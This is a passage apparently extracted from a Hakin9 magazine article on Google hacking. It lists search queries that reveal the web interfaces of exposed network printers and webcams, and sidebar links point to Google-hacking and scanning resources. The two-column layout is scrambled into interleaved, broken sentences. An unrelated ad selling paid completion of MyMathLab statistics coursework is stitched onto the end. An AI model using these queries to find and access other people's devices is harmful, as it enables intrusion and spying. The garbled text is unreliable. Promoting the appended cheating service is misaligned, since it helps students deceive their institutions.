intitle:"Dell Laser Printer" ews Dell printers with EWS technology
intext:centreware inurl:status Xerox Phaser 4500/6250/8200/8400 printers inurl:hp/device/this.LCDispatcher HP printers intitle:liveapplet inurl:LvAppl Canon Webview webcams
intitle:"EvoCam" inurl:"webcam.html" Evocam webcams inurl:"ViewerFrame?Mode=" Panasonic Network Camera webcams
(intext:"MOBOTIX M1" | intext:"MOBOTIX M10") intext:"Open
Mobotix webcams Menu" Shift-Reload
inurl:indexFrame.shtml Axis Axis webcams SNC-RZ30 HOME Sony SNC-RZ30 webcams intitle:"my webcamXP server!" inurl:":8080" webcams accessible via WebcamXP Server allintitle:Brains, Corp. camera webcams accessible via mmEye
intitle:"active webcam page" USB webcams
handling documents within the
in the same network or even other organisation, complete with clearly
networks. Webcams are, of course, defined responsibilities and penal-
much less dangerous, so hacking ties for infringements.
them can only be seen as entertain-
Network Devices
ment, although it's not hard to im- agine situations where data from a Many administrator downplay the importance of securing such devices as network printers or
On the Net
webcams. However, an insecure
• http://johnny.ihackstuff.com – largest repository of data on Google hacking, printer can provide an intruder with
• http://insecure.org/nmap/ – Nmap network scanner, a foothold that can later be used as
• http://thc.org/thc-amap/ – amap network scanner. a basis for attacking other systems
www.hakin9.org

webcam could be useful (industrial espionage, robberies etc.). Table 8 contains sample queries revealing printers and webcams, while Fig- ure 12 shows a printer configuration page found on the Web. ∎

Statistics Help Online

Are you a college student taking a statistics course and interested in paying someone to do mymathlab  for you ? We provide stats help in ar...